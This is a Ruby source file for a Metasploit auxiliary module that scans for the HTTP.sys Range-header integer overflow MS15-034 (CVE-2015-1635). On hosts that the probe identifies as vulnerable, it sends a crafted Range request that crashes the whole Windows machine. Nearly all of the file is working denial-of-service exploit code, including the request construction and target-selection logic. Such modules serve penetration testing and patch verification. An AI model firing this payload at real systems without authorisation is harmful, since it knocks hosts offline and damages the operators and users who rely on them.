##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

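# MS15-034 / CVE-2015-1635: a Range-header integer overflow in HTTP.sys (the
# ULongLongAdd the module name refers to).
#
# For each host the module first sends a harmless probe (an oversized Range
# against a static resource) and only if that comes back Vulnerable does it send
# the second, crashing Range request. Both request shapes come from the analyses
# listed under References.
class MetasploitModule < Msf::Auxiliary

  # Watch out, dos all the things
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service',
        'Description' => %q{
          This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a
          vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code
          execution. This module will try to cause a denial-of-service.
        },
        'Author' => [
          # Bill did all the work (see the pastebin code), twitter: @hectorh56193716
          'Bill Finlayson',
          # MSF. But really, these people made it happen:
          # https://github.com/rapid7/metasploit-framework/pull/5150
          'sinn3r'
        ],
        'References' => [
          ['CVE', '2015-1635'],
          ['MSB', 'MS15-034'],
          ['URL', 'https://pastebin.com/ypURDPc4'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],
          ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],
          ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']
        ],
        'License' => MSF_LICENSE,
        'Notes' => {
          # HTTP.sys is a kernel-mode driver, so a successful DoS bugchecks (BSODs)
          # the whole host, not just the web service. Whether it comes back on its
          # own depends on the target's automatic-restart setting.
          'Stability' => [CRASH_OS_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])
      ]
    )
  end

  # Upper bound used in both crafted Range headers: 2^64 - 1, the largest
  # unsigned 64-bit value, which is what makes the length arithmetic wrap.
  def upper_range
    0xFFFFFFFFFFFFFFFF
  end

  # Scanner entry point. The DoS request is only fired at hosts the check
  # positively identified, because on a vulnerable target it takes the host down.
  def run_host(ip)
    if check_host(ip) == Exploit::CheckCode::Vulnerable
      dos_host(ip)
    else
      print_status('Probably not vulnerable, will not dos it.')
    end
  end

  # Memoized so the resource #check_host settles on (it assigns target_uri.path)
  # is the same object #dos_host and #get_file_size read back later.
  def target_uri
    @target_uri ||= super
  end

  # Size in bytes of the resource the check selected, or -1 when it could not be
  # fetched (no response, or a 404). Memoized; note a -1 is memoized as well, so
  # a caller gets one attempt per module instance.
  def get_file_size(_ip)
    @get_file_size ||= fetch_file_size
  end

  # Sends the crashing request. The lower bound sits just inside the resource
  # and the upper bound is 2^64-1, so the length HTTP.sys derives from the
  # range wraps around.
  def dos_host(ip)
    file_size = get_file_size(ip)
    # A negative size means the resource could not be fetched, and anything
    # below 2 would give a negative lower bound; in both cases the Range header
    # would be garbage, so do not fire a blind request.
    if file_size < 2
      print_error("#{peer} - Could not determine a usable size for #{target_uri.path}, not sending DoS request")
      return
    end
    lower_range = file_size - 2

    # Rex is used directly rather than the HttpClient mixin: the mixin waits for
    # a response, and a target that crashed on this request never sends one, so
    # the module would hang too.
    uri = normalize_uri(target_uri.path)
    begin
      # Honour the same RPORT/SSL/VHOST the check phase used. A bare
      # Client.new(ip) always talks cleartext to port 80 with the IP as Host
      # header, so the DoS would miss any target not set up exactly like that.
      cli = Rex::Proto::Http::Client.new(ip, rport, {}, ssl)
      cli.set_config('vhost' => vhost)
      cli.connect
      req = cli.request_raw(
        'uri' => uri,
        'method' => 'GET',
        'headers' => {
          'Range' => "bytes=#{lower_range}-#{upper_range}"
        }
      )
      cli.send_request(req)
      # The connection is intentionally neither read from nor closed here: no
      # reply is expected, and tearing it down immediately might let the target
      # cancel the request before it reaches the faulty range handling.
    rescue ::Errno::EPIPE, ::Timeout::Error
      # Same exceptions the HttpClient mixin catches; the request may already
      # have landed, so it is still reported as sent.
    end
    print_status('DOS request sent')
  end

  # Candidate resources for the check. A TARGETURI that names a file is used as
  # is; for a directory the module tries welcome.png (the image shipped with the
  # default IIS start page) plus every same-host asset referenced from the
  # index page via link/script/style/img href or src attributes.
  def potential_static_files_uris
    uri = normalize_uri(target_uri.path)

    return [uri] unless uri.end_with?('/')

    uris = ["#{uri}welcome.png"]
    res = send_request_raw('uri' => uri, 'method' => 'GET')

    return uris unless res

    site_uri = URI.parse(full_uri)
    page = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))

    page.xpath('//link|//script|//style|//img').each do |tag|
      %w[href src].each do |attribute|
        attr_value = tag[attribute]
        next unless attr_value && !attr_value.empty?

        begin
          asset_uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip))
        rescue URI::Error
          # Attribute values come from an untrusted page; skip what URI cannot
          # parse instead of letting it abort the whole check for this host.
          next
        end

        # Only same-host assets, and only those whose path looks like a file
        next unless asset_uri.host == vhost || asset_uri.host == rhost

        uris << asset_uri.path if asset_uri.path =~ /\.[a-z]{2,}$/i
      end
    end

    uris.uniq
  end

  # Vulnerability check. A Range whose upper bound is 2^64-1 is answered by an
  # unpatched HTTP.sys with a "Requested Range Not Satisfiable" error page,
  # while a patched one rejects the header with "The request has an invalid
  # header name". The match is on the body text; the status code is only
  # printed. Any other answer leaves the host Unknown.
  def check_host(_ip)
    potential_static_files_uris.each do |potential_uri|
      uri = normalize_uri(potential_uri)

      res = send_request_raw(
        'uri' => uri,
        'method' => 'GET',
        'headers' => {
          'Range' => "bytes=0-#{upper_range}"
        }
      )

      vmessage = "#{peer} - Checking #{uri}"

      if res && res.body.include?('Requested Range Not Satisfiable')
        vprint_status("#{vmessage} [#{res.code}] - Vulnerable")

        # Remember which resource triggered it so #dos_host hits the same one
        target_uri.path = uri

        return Exploit::CheckCode::Vulnerable
      elsif res && res.body.include?('The request has an invalid header name')
        vprint_status("#{vmessage} [#{res.code}] - Safe")

        return Exploit::CheckCode::Safe
      else
        vprint_status("#{vmessage} - Unknown")
      end
    end

    Exploit::CheckCode::Unknown
  end

  private

  # One uncached fetch of target_uri.path through the HttpClient mixin.
  # Returns the body size in bytes, or -1 on no response / 404.
  def fetch_file_size
    uri = normalize_uri(target_uri.path)
    res = send_request_raw('uri' => uri)

    unless res
      vprint_error('Connection timed out')
      return -1
    end

    if res.code == 404
      vprint_error('You got a 404. URI must be a valid resource.')
      return -1
    end

    # Range offsets are bytes: bytesize is exact whatever the body's encoding,
    # whereas length counts characters.
    file_size = res.body.bytesize
    vprint_status("File length: #{file_size} bytes")

    file_size
  end
end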